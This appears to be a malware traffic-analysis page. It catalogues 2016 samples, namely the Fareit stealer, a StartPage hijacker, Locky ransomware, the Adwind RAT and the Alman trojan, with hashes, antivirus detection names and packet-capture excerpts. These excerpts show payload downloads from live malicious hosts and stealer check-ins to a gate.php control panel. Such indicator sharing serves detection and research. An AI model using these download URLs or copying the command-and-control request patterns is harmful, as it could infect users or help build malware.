Text Example

Fereit/Symmi Shit.exe Trojan Password Stealer Malware PCAP file download Traffic Analysis Sample

SHA256: 54c8ce7531f1b01dcda678c41fb14ffc5f223ff0427fc83de939d2286ad200f0
File name: shit.exe
Detection ratio: 39 / 56
Analysis date: 2016-10-31 02:32:28 UTC ( 0 minutes ago )
AVG Crypt6.HNN 20161031
AVware Trojan.Win32.Generic!BT 20161031
Ad-Aware Gen:Variant.Symmi.68665 20161031
AhnLab-V3 Trojan/Win32.Fareit.N2141190184 20161030
Antiy-AVL Trojan[PSW]/Win32.Fareit 20161031
Arcabit Trojan.Symmi.D10C39 20161031
Avast Win32:Malware-gen 20161031
Avira (no cloud) TR/Agent.egpwh 20161030
BitDefender Gen:Variant.Symmi.68665 20161031
CAT-QuickHeal (Suspicious) – DNAScan 20161029
ClamAV Win.Trojan.Generic-3223 20161031
CrowdStrike Falcon (ML) malicious_confidence_82% (W) 20161024
DrWeb Trojan.PWS.Stealer.1932 20161031
ESET-NOD32 a variant of Win32/Kryptik.FIKV 20161030
Emsisoft Gen:Variant.Symmi.68665 (B) 20161031
F-Secure Gen:Variant.Symmi.68665 20161031
Fortinet W32/Fareit.CEIG!tr.pws 20161031
GData Gen:Variant.Symmi.68665 20161031
Ikarus Trojan.Win32.Crypt 20161030
Invincea virtool.win32.obfuscator.xy 20161018

2016-10-30 22:38:24.577664 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [P.], seq 0:315, ack 1, win 256, length 315: HTTP: GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
E..c..@……..fU……P.j…XX.P…._..GET /~kingskil/Prince/Man/lucy/mine/shit.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kingskillz.ru
Connection: Keep-Alive

2016-10-30 22:38:24.754088 IP 192.168.1.102.61884 > 85.143.222.24.80: Flags [.], ack 2908, win 256, length 0
E..(..@….4…fU……P.j…Xd1P…y………

E..(..@….(…fU……P:…../.P………….
2016-10-30 22:38:46.639495 IP 192.168.1.102.61887 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@……..fU……P:…../.P….s..POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(..@….”…fU……P….i…P…w=……..
2016-10-30 22:38:54.708909 IP 192.168.1.102.61888 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@……..fU……P….i…P…[…POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


E..(..@……..fU……P..n;….P………….
2016-10-30 22:39:02.332735 IP 192.168.1.102.61889 > 85.143.222.24.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
E..N..@……..fU……P..n;….P….s..POST /%7Ekingskil/Prince/Man/lucy/mine/gate.php HTTP/1.0
Host: kingskillz.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 340
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

 

 

Clickfraud Browswer Hijacker fcssq.exe STARTPAGE Malware Trojan PCAP file download sample

SHA256: 5bfb7c23c0000a681f4c5d259754fd45b740128956a8eba0c0f18f68e73c0b8f
File name: fcssq.exe
Detection ratio: 27 / 56
Analysis date: 2016-10-31 02:08:15 UTC ( 0 minutes ago )
AVG Startpage.XMP 20161031
AVware Trojan.Win32.Generic!BT 20161031
AegisLab Troj.Startpage.Gen!c 20161031
Avast Win32:Malware-gen 20161031
Avira (no cloud) TR/StartPage.663918 20161030
Comodo UnclassifiedMalware 20161031
DrWeb Trojan.DownLoader13.14385 20161031
ESET-NOD32 a variant of Win32/StartPage.NQH 20161030
Fortinet W32/StartPage.NQH!tr 20161031
GData Win32.Trojan.Agent.O9KH9R 20161031
Ikarus Trojan.Win32.StartPage 20161030
K7AntiVirus Trojan ( 004b9d361 ) 20161030
K7GW Trojan ( 004b9d361 ) 20161031
Kaspersky not-a-virus:AdWare.Win32.Amonetize.emdm 20161031
McAfee RDN/Generic.bfr 20161031
McAfee-GW-Edition RDN/Generic.bfr 20161031
NANO-Antivirus Trojan.Win32.DownLoader13.dujqej 20161031
Qihoo-360 Win32/Trojan.e26 20161031
Sophos Generic PUA AJ (PUA) 20161030
Tencent Win32.Trojan.Startpage.Eddi 20161031
TrendMicro TROJ_GEN.R02LC0FHN16 20161031

2016-10-30 21:59:34.586083 IP 192.168.1.102.61485 > 47.88.28.26.80: Flags [P.], seq 0:297, ack 1, win 256, length 297: HTTP: GET /soft/fcssq.exe HTTP/1.1
E..Q{.@…p….f/X…-.P…?…OP…}…GET /soft/fcssq.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down3.feiyang163.com
Connection: Keep-Alive

2016-10-30 21:59:34.689591 IP 192.168.1.102.61485 > 47.88.28.26.80: Flags [.], ack 2921, win 256, length 0
E..({.@…q….f/X…-.P…h….P…D………

E..(|.@…p….f/X…..P6.-..L..P………….
2016-10-30 21:59:46.257998 IP 192.168.1.102.61486 > 47.88.28.26.80: Flags [P.], seq 0:236, ack 1, win 256, length 236: HTTP: GET /ad/softad/popup.htm HTTP/1.1
E…|.@…o….f/X…..P6.-..L..P….O..GET /ad/softad/popup.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: adsvc1.unadnet.com.cn
Connection: Keep-Alive

2016-10-30 21:59:46.266779 IP 192.168.1.102.61487 > 47.88.28.26.80: Flags [.], ack 2994073208, win 256, length 0
E..(|.@…p….f/X…/.P…..u.xP…^………
2016-10-30 21:59:46.267231 IP 192.168.1.102.61487 > 47.88.28.26.80: Flags [P.], seq 0:237, ack 1, win 256, length 237: HTTP: GET /count/softcount/?pwc HTTP/1.1
E…|.@…o….f/X…/.P…..u.xP…….GET /count/softcount/?pwc HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: adsvc1.unadnet.com.cn
Connection: Keep-Alive

2016-10-30 21:59:46.353528 IP 192.168.1.102.61486 > 47.88.28.26.80: Flags [P.], seq 236:474, ack 876, win 253, length 238: HTTP: GET /ad/softad/tuijian.htm HTTP/1.1
E…|.@…o….f/X…..P6….L..P…h…GET /ad/softad/tuijian.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: adsvc1.unadnet.com.cn
Connection: Keep-Alive

Locky Ransomware Malware aoteatrial.net/02yls0 PCAP file download traffic sample

SHA256: 9081ecf001a89fb1fa6f2855c6385d43fd473d69de0e58ed9b9e7e23ac954aff
File name: 02yls0
Detection ratio: 33 / 56
Analysis date: 2016-10-29 07:47:22 UTC ( 0 minutes ago )
Arcabit Trojan.Agent.CAHB 20161029
Avast Win32:Malware-gen 20161029
Avira (no cloud) TR/Crypt.ZPACK.elnee 20161028
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9942 20161029
BitDefender Trojan.Agent.CAHB 20161029
Bkav HW32.Packed.AE7D 20161029
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
Cyren W32/Locky.BC.gen!Eldorado 20161029
ESET-NOD32 a variant of Win32/Kryptik.FIQB 20161029
Emsisoft Trojan.Agent.CAHB (B) 20161029
F-Prot W32/Locky.BC.gen!Eldorado 20161029
F-Secure Trojan.Agent.CAHB 20161029
Fortinet W32/Generic.FIQB!tr 20161029
GData Trojan.Agent.CAHB 20161029
Invincea ransom.win32.locky.a 20161018
K7AntiVirus Trojan ( 004fbad41 ) 20161029
K7GW Trojan ( 004fbad41 ) 20161029
Kaspersky HEUR:Trojan.Win32.Generic 20161029
Malwarebytes Ransom.Locky 20161029

2016-10-29 02:50:44.243416 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [P.], seq 0:283, ack 1, win 256, length 283: HTTP: GET /02yls0 HTTP/1.1
E..CXK@……..f…….PO…d…P….N..GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive
2016-10-29 02:50:45.116064 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 2921, win 256, length 0
E..(XL@……..f…….PO…d..-P………….

E..(.!@……..fhp.S…P.}…..<P…<………
2016-10-29 02:50:52.686092 IP 192.168.1.102.64954 > 104.112.255.83.80: Flags [P.], seq 0:262, ack 1, win 256, length 262: HTTP: GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
E….”@……..fhp.S…P.}…..<P…^…GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive
2016-10-29 02:50:52.765557 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 247008, win 252, length 0
E..(X.@….~…f…….PO…d.m.P………….

E..(X.@….z…f…….P.4.Q…aP…}9……..
2016-10-29 02:50:57.973364 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /02yls0 HTTP/1.1
E…X.@……..f…….P.4.Q…aP….X..GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=245702-
Unless-Modified-Since: Fri, 28 Oct 2016 07:32:48 GMT
If-Range: “3c400-53fe7dd719b7b”
Host: aoteatrial.net
Connection: Keep-Alive


E..(..@…D=…f6……….dz.fJP…%………
2016-10-29 02:51:33.922947 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 392:675, ack 1360, win 251, length 283: HTTP: GET /142y5x HTTP/1.1
E..CX.@….\…f…….P.4……P…….GET /142y5x HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive

 

 

Western Union Statement Malspam Adwind Malware Trojan PCAP file download traffic sample

SHA256: 51d0f63e2d215ab1e4240468b8a518412472dc90ed24fffb8e5cf1e7aa75ede2
File name: Western_Union_Agent_Statement_and_summary_pdf.jar
Detection ratio: 19 / 55
Analysis date: 2016-10-29 07:42:32 UTC ( 0 minutes ago )
ALYac Trojan.Java.Adwind 20161029
AVware Trojan.Java.Generic.a (v) 20161029
AegisLab Troj.Java.Agent!c 20161029
AhnLab-V3 HEUR/Jarex 20161028
Avast Java:Adwind-G [Trj] 20161029
ClamAV Java.Malware.Agent-1803486 20161029
DrWeb Java.Adwind.179 20161029
ESET-NOD32 a variant of Java/Adwind.AAJ 20161029
GData Java.Trojan.Agent.PLRUTU 20161029
Ikarus Trojan.Java.Adwind 20161028
Kaspersky HEUR:Trojan.Java.Agent.gen 20161029
McAfee Adwind!jar 20161029
McAfee-GW-Edition Artemis!Trojan 20161029
Sophos Java/Adwind-IV 20161029
Symantec Trojan.Maljava 20161029
TrendMicro JAVA_ADWIND.JCC 20161029
TrendMicro-HouseCall JAVA_ADWIND.JCC 20161029
VIPRE Trojan.Java.Generic.a (v) 20161029
ViRobot JAVA.S.Adwind.232864[h]

What is Adwind?

Adwind RAT, a cross-platform, multifunctional malware program also known as AlienSpy, Frutas, Unrecom, Sockrat, JSocket and jRat, and which is distributed through a single malware-as-a-service platform. One of the main features that distinguishes Adwind RAT from other commercial malware is that it is distributed openly in the form of a paid service, where the “customer” pays a fee in return for use of the malicious program. There were around 1,800 users of the system by the end of 2015. This makes it one of the biggest malware platforms in existence today.

What it can do?

The malware’s list of functions includes the ability to:

  • collect keystrokes
  • steal cached passwords and grab data from web forms
  • take screenshots
  • take pictures and record video from a webcam
  • record sound from a microphone
  • transfer files
  • collect general system and user information
  • steal keys for cryptocurrency wallets
  • manage SMS (for Android)
  • steal VPN certificates

 

2016-10-29 01:33:10.718213 IP 192.168.1.102.64306 > 209.140.29.13.80: Flags [P.], seq 0:330, ack 1, win 256, length 330: HTTP: GET /host/Western_Union_Agent_Statement_and_summary_pdf.jar HTTP/1.1
E..r,V@……..f…..2.P..+…c.P….K..GET /host/Western_Union_Agent_Statement_and_summary_pdf.jar HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: linamhost.com
Connection: Keep-Alive
2016-10-29 01:33:10.757538 IP 192.168.1.102.64306 > 209.140.29.13.80: Flags [.], ack 2921, win 256, length 0
E..(,W@……..f…..2.P..,…n.P………….

E..(f.@…d….f..hb.3.P..E.C…P….$……..
2016-10-29 01:33:18.611584 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [P.], seq 0:299, ack 1, win 256, length 299: HTTP: GET /Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&ar
chitecture=32 HTTP/1.1
E..Sf.@…b….f..hb.3.P..E.C…P…?…GET /Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&architecture=32 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: rarlab.com
Connection: Keep-Alive
2016-10-29 01:33:18.731444 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [.], ack 2890, win 256, length 0
E..(f.@…d….f..hb.3.P..F.C…P………….
2016-10-29 01:33:18.782329 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [P.], seq 299:658, ack 3393, win 254, length 359: HTTP: GET /Notifier/css/basic.css?20160912 HTTP/1.1
E…f.@…b….f..hb.3.P..F.C. .P…….GET /Notifier/css/basic.css?20160912 HTTP/1.1
Accept: */*
Referer: http://rarlab.com/Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&architecture=32
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: rarlab.com
Connection: Keep-Alive
2016-10-29 01:33:18.784392 IP 192.168.1.102.64308 > 5.135.104.98.80: Flags [S], seq 3160342502, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

E..(f.@…d….f..hb.3.P..H,C…P….W……..
2016-10-29 01:33:18.893281 IP 192.168.1.102.64307 > 5.135.104.98.80: Flags [P.], seq 658:1031, ack 5180, win 256, length 373: HTTP: GET /Notifier/css/default_css_rrlb_en.css?20160912 HTTP/1.1
E…f.@…b….f..hb.3.P..H,C…P…….GET /Notifier/css/default_css_rrlb_en.css?20160912 HTTP/1.1
Accept: */*
Referer: http://rarlab.com/Notifier/?language=English&source=RARLAB&landingpage=firstexpired&version=511&architecture=32
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: rarlab.com
Connection: Keep-Alive

css.jipinfeiche.cn Alman Trojan Malware PCAP file download traffic sample installad_304.dat c2

SHA256: a3b7e3fd4c709cc40be1b7114b109bc16228374f31f692311348abf2ea4d09b8
File name: fcjingdianyouxihejizhongwenban.exe
Detection ratio: 31 / 48
Analysis date: 2016-10-29 07:26:36 UTC ( 1 minute ago )
ESET-NOD32 Win32/Alman.NAB 20161029
Emsisoft Worm.Generic.532532 (B) 20161029
F-Secure Worm.Generic.532532 20161029
GData Worm.Generic.532532 20161029
Ikarus Virus.Win32.Alman 20161028
Invincea virus.win32.ramnit.a 20161018
Jiangmin Win32/Almana.c 20161029
Kaspersky Virus.Win32.Alman.b 20161029
Malwarebytes Trojan.ChinAd 20161029
McAfee-GW-Edition Artemis 20161029
eScan Worm.Generic.532532 20161029
NANO-Antivirus Virus.Win32.Alman.xyevp 20161029
Panda Generic Suspicious 20161028
Qihoo-360 Win32/Trojan.323 20161029
Sophos Mal/Generic-S 20161029
Symantec Heur.AdvML.B 20161029
Tencent Win32.Virus.Alman.Ahem 20161029
TheHacker Trojan/.Agent.bt 20161028
VBA32 Virus.Win32.Alman.B 20161028
Zoner Win32.Alman.NAB 20161029

2016-10-29 01:50:41.235203 IP 192.168.1.102.64692 > 218.77.77.34.80: Flags [P.], seq 0:316, ack 1, win 256, length 316: HTTP: GET /fcjingdianyouxihejizhongwenban.exe HTTP/1.1
E..d`Y@……..f.MM”…PXFF.3.  yP…7 ..GET /fcjingdianyouxihejizhongwenban.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down7.downyouxi.com
Connection: Keep-Alive

2016-10-29 01:50:41.536118 IP 192.168.1.102.64692 > 218.77.77.34.80: Flags [.], ack 2921, win 256, length 0
E..(`Z@……..f.MM”…PXFH73…P….;……..

E..(4;@……..fh_…..Pk{.(.Q..P………….
2016-10-29 01:54:47.322248 IP 192.168.1.102.64712 > 104.95.25.151.80: Flags [P.], seq 0:214, ack 1, win 256, length 214: HTTP: GET /Market.svc/AppTileV3?symbols=29.10.%40CCO.29.COMP&contentType=0&tileType=0&locale=EN-US&symbolTypes=I HTTP/1.1
E…4<@……..fh_…..Pk{.(.Q..P…(…GET /Market.svc/AppTileV3?symbols=29.10.%40CCO.29.COMP&contentType=0&tileType=0&locale=EN-US&symbolTypes=I HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WNS/10.0
Host: finance.services.appex.bing.com

2016-10-29 01:54:47.355866 IP 192.168.1.102.64714 > 104.95.25.151.80: Flags [.], ack 3234256246, win 256, length 0
E..(4=@……..fh_…..P…….vP………….
2016-10-29 01:54:47.355886 IP 192.168.1.102.64713 > 104.95.25.151.80: Flags [.], ack 3299911539, win 256, length 0
E..(4>@……..fh_…..P.       .y…sP………….
2016-10-29 01:54:47.355890 IP 192.168.1.102.64715 > 23.34.0.76.80: Flags [.], ack 2971165570, win 256, length 0
E..(&.@……..f.”.L…PI..i..c.P…z………
2016-10-29 01:54:47.356814 IP 192.168.1.102.64714 > 104.95.25.151.80: Flags [P.], seq 0:217, ack 1, win 256, length 217: HTTP: GET /Market.svc/AppTileV3?symbols=30.10.%21DJI.30.%24INDU&contentType=0&tileType=0&locale=EN-US&symbolTypes=I HTTP/1.1
E…4?@……..fh_…..P…….vP…?…GET /Market.svc/AppTileV3?symbols=30.10.%21DJI.30.%24INDU&contentType=0&tileType=0&locale=EN-US&symbolTypes=I HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WNS/10.0
Host: finance.services.appex.bing.com

2016-10-29 02:12:07.225822 IP 192.168.1.102.64792 > 120.132.92.122.80: Flags [P.], seq 0:206, ack 1, win 259, length 206: HTTP: GET /advert/get.php?type=1&name=FC%C2%BE%C2%AD%C2%B5%C3%A4%C3%93%C3%8E%C3%8F%C2%B7%C2%BA%C3%8F%C2%BC%C2%AF+%C3%96%C3%90%C3%8E%C3%84%C2%B0%C3%A6&site=1 HTTP/1.1
E…gh@……..fx.\z…P…..>.`P…fX..GET /advert/get.php?type=1&name=FC%C2%BE%C2%AD%C2%B5%C3%A4%C3%93%C3%8E%C3%8F%C2%B7%C2%BA%C3%8F%C2%BC%C2%AF+%C3%96%C3%90%C3%8E%C3%84%C2%B0%C3%A6&site=1 HTTP/1.1
Host: www.qq5.com
Connection: Keep-Alive

2016-10-29 02:12:07.541884 IP 192.168.1.102.64792 > 120.132.92.122.80: Flags [.], ack 518, win 257, length 0
E..(gi@….Y…fx.\z…P…..>.eP………….
2016-10-29 02:12:08.022699 IP 192.168.1.102.63007 > 75.75.75.75.53: 24044+ A? css.jipinfeiche.cn. (36)
E..@8P………fKKKK…5.,S.]…………css.jipinfeiche.cn…..
2016-10-29 02:12:09.030304 IP 192.168.1.102.63008 > 75.75.75.75.53: 24044+ A? css.jipinfeiche.cn. (36)
E..@8Q………fKKKK. .5.,S.]…………css.jipinfeiche.cn…..

E..(WB@….o…f.=…..P<.H ….P………….
2016-10-29 02:12:10.718966 IP 192.168.1.102.64793 > 183.61.19.211.80: Flags [P.], seq 0:213, ack 1, win 256, length 213: HTTP: GET /advert/get.php?type=1&name=FC%C2%BE%C2%AD%C2%B5%C3%A4%C3%93%C3%8E%C3%8F%C2%B7%C2%BA%C3%8F%C2%BC%C2%AF+%C3%96%C3%90%C3%8E%C3%84%C2%B0%C3%A6&site=1 HTTP/1.1
E…WC@……..f.=…..P<.H ….P…./..GET /advert/get.php?type=1&name=FC%C2%BE%C2%AD%C2%B5%C3%A4%C3%93%C3%8E%C3%8F%C2%B7%C2%BA%C3%8F%C2%BC%C2%AF+%C3%96%C3%90%C3%8E%C3%84%C2%B0%C3%A6&site=1 HTTP/1.1
Host: css.jipinfeiche.cn
Connection: Keep-Alive

2016-10-29 02:12:10.964277 IP 192.168.1.102.64792 > 120.132.92.122.80: Flags [P.], seq 206:320, ack 518, win 257, length 114: HTTP: GET /advert/manage/runtime/dat/installad/installad_304.dat HTTP/1.1
E…gj@……..fx.\z…P…..>.eP…R…GET /advert/manage/runtime/dat/installad/installad_304.dat HTTP/1.1
Host: www.qq5.com
Connection: Keep-Alive

2016-10-29 02:12:11.020155 IP 192.168.1.102.64793 > 183.61.19.211.80: Flags [.], ack 547, win 254, length 0
E..(WD@….m…f.=…..P<.H…..P………….
2016-10-29 02:12:11.035916 IP 192.168.1.102.63008 > 75.75.76.76.53: 24044+ A? css.jipinfeiche.cn. (36)
E..@0……0…fKKLL. .5.,R.]…………css.jipinfeiche.cn…..
2016-10-29 02:12:11.216819 IP 192.168.1.102.64793 > 183.61.19.211.80: Flags [P.], seq 213:334, ack 547, win 254, length 121: HTTP: GET /advert/manage/runtime/dat/installad/installad_304.dat HTTP/1.1
E…WE@……..f.=…..P<.H…..P…….GET /advert/manage/runtime/dat/installad/installad_304.dat HTTP/1.1
Host: css.jipinfeiche.cn
Connection: Keep-Alive